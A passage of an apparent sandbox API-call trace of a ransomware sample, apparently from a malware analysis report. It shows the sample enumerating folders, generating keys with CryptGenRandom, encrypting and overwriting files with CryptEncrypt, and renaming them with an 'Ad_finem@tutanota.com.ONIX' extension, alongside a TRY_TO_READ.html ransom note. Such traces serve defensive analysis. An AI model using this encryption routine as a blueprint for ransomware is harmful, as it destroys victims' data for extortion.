lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.370] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-10009c354ca09c354b444c.lock") returned 86 [0065.370] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-10009c354ca09c354b444c.lock" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-10009c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.372] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.372] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.372] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43e3f8 [0065.372] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca68 | out: hHeap=0x410000) returned 1 [0065.372] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.372] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fd8 | out: hHeap=0x410000) returned 1 [0065.372] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447d28 [0065.372] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.372] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.373] GetLastError () returned 0x0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x461440 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.373] GetLastError () returned 0x0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447d68 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447d68 | out: hHeap=0x410000) returned 1 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.373] FindNextFileW (in: hFindFile=0x447d28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.373] GetLastError () returned 0x0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x461440 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.373] GetLastError () returned 0x0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447d68 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447d68 | out: hHeap=0x410000) returned 1 [0065.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0065.373] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.373] FindNextFileW (in: hFindFile=0x447d28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.374] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.374] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.374] GetLastError () returned 0x0 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x461440 [0065.374] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.374] GetLastError () returned 0x0 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.374] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.374] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.374] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x460008 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x485cb8 [0065.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.374] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x3f4 [0065.374] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.374] LockFile (hFile=0x3f4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x81, nNumberOfBytesToLockHigh=0x0) returned 1 [0065.374] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0065.374] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.375] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x485cb8 | out: pbBuffer=0x485cb8) returned 1 [0065.375] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665b8 | out: pbBuffer=0x4665b8) returned 1 [0065.375] SetFileAttributesW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", dwFileAttributes=0x80) returned 1 [0065.375] lstrlenW (lpString="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 75 [0065.375] GetProcessHeap () returned 0x410000 [0065.375] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467a20 [0065.375] lstrcpyW (in: lpString1=0x467a20, lpString2="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" | out: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" [0065.375] lstrcatW (in: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.375] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=129) returned 1 [0065.375] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x81 [0065.375] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0065.375] GetProcessHeap () returned 0x410000 [0065.375] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x485dc0 [0065.375] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x485dc0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x485dc0*, pdwDataLen=0x367f414*=0x100) returned 1 [0065.375] WriteFile (in: hFile=0x3f4, lpBuffer=0x485dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x485dc0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0065.378] WriteFile (in: hFile=0x3f4, lpBuffer=0x4665b8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665b8*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0065.379] WriteFile (in: hFile=0x3f4, lpBuffer=0x4665b8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665b8*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0065.380] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x81) returned 0x485ec8 [0065.380] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x81) returned 0x485f58 [0065.380] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.380] ReadFile (in: hFile=0x3f4, lpBuffer=0x485ec8, nNumberOfBytesToRead=0x81, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x485ec8*, lpNumberOfBytesRead=0x367f44c*=0x81, lpOverlapped=0x0) returned 1 [0065.380] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=-129, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.380] WriteFile (in: hFile=0x3f4, lpBuffer=0x485f58*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x485f58*, lpNumberOfBytesWritten=0x367f44c*=0x81, lpOverlapped=0x0) returned 1 [0065.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x485ec8 | out: hHeap=0x410000) returned 1 [0065.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x485f58 | out: hHeap=0x410000) returned 1 [0065.382] UnlockFile (hFile=0x3f4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x81, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0065.382] CloseHandle (hObject=0x3f4) returned 1 [0065.383] GetProcessHeap () returned 0x410000 [0065.383] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x485dc0 | out: hHeap=0x410000) returned 1 [0065.383] MoveFileExW (lpExistingFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), lpNewFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0065.386] GetProcessHeap () returned 0x410000 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467a20 | out: hHeap=0x410000) returned 1 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x485cb8 | out: hHeap=0x410000) returned 1 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0065.386] FindNextFileW (in: hFindFile=0x447d28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x306c10b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0065.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.386] GetLastError () returned 0x0 [0065.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x461440 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.386] GetLastError () returned 0x0 [0065.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.386] FindNextFileW (in: hFindFile=0x447d28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x306c10b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.386] CloseHandle (hObject=0x3cc) returned 1 [0065.386] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.387] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x22)) [0065.387] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.387] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.387] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.387] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\cs-CZ9c354ca09c354b444c.lock") returned 37 [0065.387] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ9c354ca09c354b444c.lock" (normalized: "c:\\boot\\cs-cz9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.388] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.389] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.389] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x471fb0 | out: hHeap=0x410000) returned 1 [0065.389] FindFirstFileW (in: lpFileName="C:\\\\Boot\\cs-CZ\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447d68 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0065.389] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.389] GetLastError () returned 0x0 [0065.389] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.389] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.389] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.389] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447da8 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447da8 | out: hHeap=0x410000) returned 1 [0065.389] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.389] FindNextFileW (in: hFindFile=0x447d68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.389] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.390] GetLastError () returned 0x0 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447da8 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447da8 | out: hHeap=0x410000) returned 1 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.390] FindNextFileW (in: hFindFile=0x447d68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.390] GetLastError () returned 0x0 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x486cc0 [0065.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.390] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.390] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.390] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.391] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.391] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x486cc0 | out: pbBuffer=0x486cc0) returned 1 [0065.391] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665b8 | out: pbBuffer=0x4665b8) returned 1 [0065.391] SetFileAttributesW (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.391] lstrlenW (lpString="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 30 [0065.391] GetProcessHeap () returned 0x410000 [0065.391] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.391] lstrcpyW (in: lpString1=0x473108, 